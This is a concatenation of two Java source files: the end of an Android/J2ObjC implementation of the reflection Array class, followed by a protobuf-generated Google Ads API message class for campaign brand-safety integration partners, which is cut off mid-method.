ArrayIndexOutOfBoundsException { if (array instanceof char[]) { ((char[]) array)[index] = c; } else if (array instanceof double[]) { ((double[]) array)[index] = c; } else if (array instanceof float[]) { ((float[]) array)[index] = c; } else if (array instanceof int[]) { ((int[]) array)[index] = c; } else if (array instanceof long[]) { ((long[]) array)[index] = c; } else { throw badArray(array); } } /** * Sets the value of the indexed component of the specified array * object to the specified {@code short} value. 
* @param array the array * @param index the index into the array * @param s the new value of the indexed component * @exception NullPointerException If the specified object argument * is null * @exception IllegalArgumentException If the specified object argument * is not an array, or if the specified value cannot be converted * to the underlying array's component type by an identity or a * primitive widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to * the length of the specified array * @see Array#set */ // Android-changed: Non-native implementation of setShort(Object, int, short). public static void setShort(Object array, int index, short s) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof short[]) { ((short[]) array)[index] = s; } else if (array instanceof double[]) { ((double[]) array)[index] = s; } else if (array instanceof float[]) { ((float[]) array)[index] = s; } else if (array instanceof int[]) { ((int[]) array)[index] = s; } else if (array instanceof long[]) { ((long[]) array)[index] = s; } else { throw badArray(array); } } /** * Sets the value of the indexed component of the specified array * object to the specified {@code int} value. * @param array the array * @param index the index into the array * @param i the new value of the indexed component * @exception NullPointerException If the specified object argument * is null * @exception IllegalArgumentException If the specified object argument * is not an array, or if the specified value cannot be converted * to the underlying array's component type by an identity or a * primitive widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to * the length of the specified array * @see Array#set */ // Android-changed: Non-native implementation of setInt(Object, int, int). 
public static void setInt(Object array, int index, int i) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof int[]) { ((int[]) array)[index] = i; } else if (array instanceof double[]) { ((double[]) array)[index] = i; } else if (array instanceof float[]) { ((float[]) array)[index] = i; } else if (array instanceof long[]) { ((long[]) array)[index] = i; } else { throw badArray(array); } } /** * Sets the value of the indexed component of the specified array * object to the specified {@code long} value. * @param array the array * @param index the index into the array * @param l the new value of the indexed component * @exception NullPointerException If the specified object argument * is null * @exception IllegalArgumentException If the specified object argument * is not an array, or if the specified value cannot be converted * to the underlying array's component type by an identity or a * primitive widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to * the length of the specified array * @see Array#set */ // Android-changed: Non-native implementation of setBoolean(Object, int, long). public static void setLong(Object array, int index, long l) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof long[]) { ((long[]) array)[index] = l; } else if (array instanceof double[]) { ((double[]) array)[index] = l; } else if (array instanceof float[]) { ((float[]) array)[index] = l; } else { throw badArray(array); } } /** * Sets the value of the indexed component of the specified array * object to the specified {@code float} value. 
* @param array the array * @param index the index into the array * @param f the new value of the indexed component * @exception NullPointerException If the specified object argument * is null * @exception IllegalArgumentException If the specified object argument * is not an array, or if the specified value cannot be converted * to the underlying array's component type by an identity or a * primitive widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to * the length of the specified array * @see Array#set */ public static void setFloat(Object array, int index, float f) throws IllegalArgumentException, ArrayIndexOutOfBoundsException { if (array instanceof float[]) { ((float[]) array)[index] = f; } else if (array instanceof double[]) { ((double[]) array)[index] = f; } else { throw badArray(array); } } /** * Sets the value of the indexed component of the specified array * object to the specified {@code double} value. * @param array the array * @param index the index into the array * @param d the new value of the indexed component * @exception NullPointerException If the specified object argument * is null * @exception IllegalArgumentException If the specified object argument * is not an array, or if the specified value cannot be converted * to the underlying array's component type by an identity or a * primitive widening conversion * @exception ArrayIndexOutOfBoundsException If the specified {@code index} * argument is negative, or if it is greater than or equal to * the length of the specified array * @see Array#set */ // Android-changed: Non-native implementation of setDouble(Object, int, double). 
public static void setDouble(Object array, int index, double d)
    throws IllegalArgumentException, ArrayIndexOutOfBoundsException {
    // double is the widest primitive type, so only double[] is accepted.
    if (array instanceof double[]) {
        ((double[]) array)[index] = d;
    } else {
        throw badArray(array);
    }
}

/*
 * Private
 */

// Android-added: Added javadocs for newArray(Class, int).
/**
 * Returns a new array of the specified component type and length.
 * Equivalent to {@code new componentType[size]}.
 *
 * @throws NullPointerException
 *             if the component type is null
 * @throws NegativeArraySizeException
 *             if {@code size < 0}
 */
// Android-changed: Non-native implementation of newArray(Class, int).
private static Object newArray(Class<?> componentType, int length)
    throws NegativeArraySizeException {
    // Reference component types are delegated to the native object-array
    // factory; each primitive type is allocated directly.
    if (!componentType.isPrimitive()) {
        return createObjectArray(componentType, length);
    } else if (componentType == char.class) {
        return new char[length];
    } else if (componentType == int.class) {
        return new int[length];
    } else if (componentType == byte.class) {
        return new byte[length];
    } else if (componentType == boolean.class) {
        return new boolean[length];
    } else if (componentType == short.class) {
        return new short[length];
    } else if (componentType == long.class) {
        return new long[length];
    } else if (componentType == float.class) {
        return new float[length];
    } else if (componentType == double.class) {
        return new double[length];
    } else if (componentType == void.class) {
        // void is primitive but has no array type.
        throw new IllegalArgumentException("Can't allocate an array of void");
    }
    // Unreachable: every primitive type is handled above.
    throw new AssertionError();
}

// Android-removed: multiNewArray(Class, int[]) method. createMultiArray used instead.
/*
private static native Object multiNewArray(Class<?> componentType,
    int[] dimensions)
    throws IllegalArgumentException, NegativeArraySizeException;
*/

// Android-added: createMultiArray(Class, int[]) method. Used instead of multiNewArray.
/*
 * Create a multi-dimensional array of objects with the specified type.
 */
// NOTE: the /*-[ ... ]-*/ blocks below are J2ObjC OCNI native bodies
// (Objective-C source emitted verbatim by the transpiler) — do not edit.
private static native Object createMultiArray(Class<?> componentType, int[] dimensions)
    throws NegativeArraySizeException /*-[
  return [IOSObjectArray arrayWithDimensions:dimensions->size_ lengths:dimensions->buffer_ type:componentType];
]-*/;

// BEGIN Android-added: Helper methods to support custom method implementations.
/*
 * Create a one-dimensional array of objects with the specified type.
 */
private static native Object createObjectArray(Class<?> componentType, int length)
    throws NegativeArraySizeException /*-[
  return [IOSObjectArray arrayWithLength:length type:componentType];
]-*/;

// Builds the "not an array" failure. Note: these helpers throw the
// exception themselves and never actually return; callers still write
// `throw notAnArray(...)` so the compiler sees a terminating statement.
private static IllegalArgumentException notAnArray(Object o) {
    throw new IllegalArgumentException("Not an array: " + o.getClass());
}

// Builds the "wrong component type" failure; also throws, never returns.
private static IllegalArgumentException incompatibleType(Object o) {
    throw new IllegalArgumentException("Array has incompatible type: " + o.getClass());
}

// Shared failure path for the get*/set* accessors: null -> NPE,
// non-array -> IllegalArgumentException, otherwise incompatible type.
private static RuntimeException badArray(Object array) {
    if (array == null) {
        throw new NullPointerException("array == null");
    } else if (!array.getClass().isArray()) {
        throw notAnArray(array);
    } else {
        throw incompatibleType(array);
    }
}
// END Android-added: Helper methods to support custom method implementations.
}
googleads/google-ads-java
36,124
google-ads-stubs-v21/src/main/java/com/google/ads/googleads/v21/common/CampaignThirdPartyBrandSafetyIntegrationPartner.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v21/common/third_party_integration_partners.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v21.common; /** * <pre> * Container for third party brand safety integration data for Campaign. * Next Id = 3 * </pre> * * Protobuf type {@code google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner} */ public final class CampaignThirdPartyBrandSafetyIntegrationPartner extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner) CampaignThirdPartyBrandSafetyIntegrationPartnerOrBuilder { private static final long serialVersionUID = 0L; // Use CampaignThirdPartyBrandSafetyIntegrationPartner.newBuilder() to construct. private CampaignThirdPartyBrandSafetyIntegrationPartner(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CampaignThirdPartyBrandSafetyIntegrationPartner() { brandSafetyIntegrationPartner_ = 0; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CampaignThirdPartyBrandSafetyIntegrationPartner(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnersProto.internal_static_google_ads_googleads_v21_common_CampaignThirdPartyBrandSafetyIntegrationPartner_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnersProto.internal_static_google_ads_googleads_v21_common_CampaignThirdPartyBrandSafetyIntegrationPartner_fieldAccessorTable .ensureFieldAccessorsInitialized( 
com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner.class, com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner.Builder.class); } private int bitField0_; public static final int BRAND_SAFETY_INTEGRATION_PARTNER_FIELD_NUMBER = 1; private int brandSafetyIntegrationPartner_ = 0; /** * <pre> * Allowed third party integration partners for brand safety verification. * </pre> * * <code>.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner brand_safety_integration_partner = 1;</code> * @return The enum numeric value on the wire for brandSafetyIntegrationPartner. */ @java.lang.Override public int getBrandSafetyIntegrationPartnerValue() { return brandSafetyIntegrationPartner_; } /** * <pre> * Allowed third party integration partners for brand safety verification. * </pre> * * <code>.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner brand_safety_integration_partner = 1;</code> * @return The brandSafetyIntegrationPartner. */ @java.lang.Override public com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner getBrandSafetyIntegrationPartner() { com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner result = com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner.forNumber(brandSafetyIntegrationPartner_); return result == null ? 
com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner.UNRECOGNIZED : result; } public static final int BRAND_SAFETY_INTEGRATION_PARTNER_DATA_FIELD_NUMBER = 2; private com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brandSafetyIntegrationPartnerData_; /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> * @return Whether the brandSafetyIntegrationPartnerData field is set. */ @java.lang.Override public boolean hasBrandSafetyIntegrationPartnerData() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> * @return The brandSafetyIntegrationPartnerData. */ @java.lang.Override public com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData getBrandSafetyIntegrationPartnerData() { return brandSafetyIntegrationPartnerData_ == null ? com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.getDefaultInstance() : brandSafetyIntegrationPartnerData_; } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> */ @java.lang.Override public com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerDataOrBuilder getBrandSafetyIntegrationPartnerDataOrBuilder() { return brandSafetyIntegrationPartnerData_ == null ? 
com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.getDefaultInstance() : brandSafetyIntegrationPartnerData_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (brandSafetyIntegrationPartner_ != com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner.UNSPECIFIED.getNumber()) { output.writeEnum(1, brandSafetyIntegrationPartner_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getBrandSafetyIntegrationPartnerData()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (brandSafetyIntegrationPartner_ != com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner.UNSPECIFIED.getNumber()) { size += com.google.protobuf.CodedOutputStream .computeEnumSize(1, brandSafetyIntegrationPartner_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getBrandSafetyIntegrationPartnerData()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner)) { return super.equals(obj); } com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner other = (com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner) obj; if (brandSafetyIntegrationPartner_ != 
other.brandSafetyIntegrationPartner_) return false; if (hasBrandSafetyIntegrationPartnerData() != other.hasBrandSafetyIntegrationPartnerData()) return false; if (hasBrandSafetyIntegrationPartnerData()) { if (!getBrandSafetyIntegrationPartnerData() .equals(other.getBrandSafetyIntegrationPartnerData())) return false; } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + BRAND_SAFETY_INTEGRATION_PARTNER_FIELD_NUMBER; hash = (53 * hash) + brandSafetyIntegrationPartner_; if (hasBrandSafetyIntegrationPartnerData()) { hash = (37 * hash) + BRAND_SAFETY_INTEGRATION_PARTNER_DATA_FIELD_NUMBER; hash = (53 * hash) + getBrandSafetyIntegrationPartnerData().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws 
com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { 
return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * Container for third party brand safety integration data for Campaign. 
* Next Id = 3 * </pre> * * Protobuf type {@code google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner) com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartnerOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnersProto.internal_static_google_ads_googleads_v21_common_CampaignThirdPartyBrandSafetyIntegrationPartner_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnersProto.internal_static_google_ads_googleads_v21_common_CampaignThirdPartyBrandSafetyIntegrationPartner_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner.class, com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner.Builder.class); } // Construct using com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getBrandSafetyIntegrationPartnerDataFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; brandSafetyIntegrationPartner_ = 0; brandSafetyIntegrationPartnerData_ = null; if (brandSafetyIntegrationPartnerDataBuilder_ != null) { 
brandSafetyIntegrationPartnerDataBuilder_.dispose(); brandSafetyIntegrationPartnerDataBuilder_ = null; } return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnersProto.internal_static_google_ads_googleads_v21_common_CampaignThirdPartyBrandSafetyIntegrationPartner_descriptor; } @java.lang.Override public com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner getDefaultInstanceForType() { return com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner build() { com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner buildPartial() { com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner result = new com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.brandSafetyIntegrationPartner_ = brandSafetyIntegrationPartner_; } int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000002) != 0)) { result.brandSafetyIntegrationPartnerData_ = brandSafetyIntegrationPartnerDataBuilder_ == null ? 
brandSafetyIntegrationPartnerData_ : brandSafetyIntegrationPartnerDataBuilder_.build(); to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner) { return mergeFrom((com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner other) { if (other == com.google.ads.googleads.v21.common.CampaignThirdPartyBrandSafetyIntegrationPartner.getDefaultInstance()) return this; if (other.brandSafetyIntegrationPartner_ != 0) { setBrandSafetyIntegrationPartnerValue(other.getBrandSafetyIntegrationPartnerValue()); } if (other.hasBrandSafetyIntegrationPartnerData()) { mergeBrandSafetyIntegrationPartnerData(other.getBrandSafetyIntegrationPartnerData()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return 
this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 8: { brandSafetyIntegrationPartner_ = input.readEnum(); bitField0_ |= 0x00000001; break; } // case 8 case 18: { input.readMessage( getBrandSafetyIntegrationPartnerDataFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private int brandSafetyIntegrationPartner_ = 0; /** * <pre> * Allowed third party integration partners for brand safety verification. * </pre> * * <code>.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner brand_safety_integration_partner = 1;</code> * @return The enum numeric value on the wire for brandSafetyIntegrationPartner. */ @java.lang.Override public int getBrandSafetyIntegrationPartnerValue() { return brandSafetyIntegrationPartner_; } /** * <pre> * Allowed third party integration partners for brand safety verification. * </pre> * * <code>.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner brand_safety_integration_partner = 1;</code> * @param value The enum numeric value on the wire for brandSafetyIntegrationPartner to set. * @return This builder for chaining. 
*/ public Builder setBrandSafetyIntegrationPartnerValue(int value) { brandSafetyIntegrationPartner_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * Allowed third party integration partners for brand safety verification. * </pre> * * <code>.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner brand_safety_integration_partner = 1;</code> * @return The brandSafetyIntegrationPartner. */ @java.lang.Override public com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner getBrandSafetyIntegrationPartner() { com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner result = com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner.forNumber(brandSafetyIntegrationPartner_); return result == null ? com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner.UNRECOGNIZED : result; } /** * <pre> * Allowed third party integration partners for brand safety verification. * </pre> * * <code>.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner brand_safety_integration_partner = 1;</code> * @param value The brandSafetyIntegrationPartner to set. * @return This builder for chaining. */ public Builder setBrandSafetyIntegrationPartner(com.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner value) { if (value == null) { throw new NullPointerException(); } bitField0_ |= 0x00000001; brandSafetyIntegrationPartner_ = value.getNumber(); onChanged(); return this; } /** * <pre> * Allowed third party integration partners for brand safety verification. 
* </pre> * * <code>.google.ads.googleads.v21.enums.ThirdPartyBrandSafetyIntegrationPartnerEnum.ThirdPartyBrandSafetyIntegrationPartner brand_safety_integration_partner = 1;</code> * @return This builder for chaining. */ public Builder clearBrandSafetyIntegrationPartner() { bitField0_ = (bitField0_ & ~0x00000001); brandSafetyIntegrationPartner_ = 0; onChanged(); return this; } private com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brandSafetyIntegrationPartnerData_; private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData, com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.Builder, com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerDataOrBuilder> brandSafetyIntegrationPartnerDataBuilder_; /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> * @return Whether the brandSafetyIntegrationPartnerData field is set. */ public boolean hasBrandSafetyIntegrationPartnerData() { return ((bitField0_ & 0x00000002) != 0); } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> * @return The brandSafetyIntegrationPartnerData. */ public com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData getBrandSafetyIntegrationPartnerData() { if (brandSafetyIntegrationPartnerDataBuilder_ == null) { return brandSafetyIntegrationPartnerData_ == null ? 
com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.getDefaultInstance() : brandSafetyIntegrationPartnerData_; } else { return brandSafetyIntegrationPartnerDataBuilder_.getMessage(); } } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> */ public Builder setBrandSafetyIntegrationPartnerData(com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData value) { if (brandSafetyIntegrationPartnerDataBuilder_ == null) { if (value == null) { throw new NullPointerException(); } brandSafetyIntegrationPartnerData_ = value; } else { brandSafetyIntegrationPartnerDataBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * <pre> * Third party partner data for YouTube brand safety verification. This is * optional metadata for partners to join or attach data to Ads campaigns. * </pre> * * <code>.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData brand_safety_integration_partner_data = 2;</code> */ public Builder setBrandSafetyIntegrationPartnerData( com.google.ads.googleads.v21.common.ThirdPartyIntegrationPartnerData.Builder builderForValue) { if (brandSafetyIntegrationPartnerDataBuilder_ == null) { 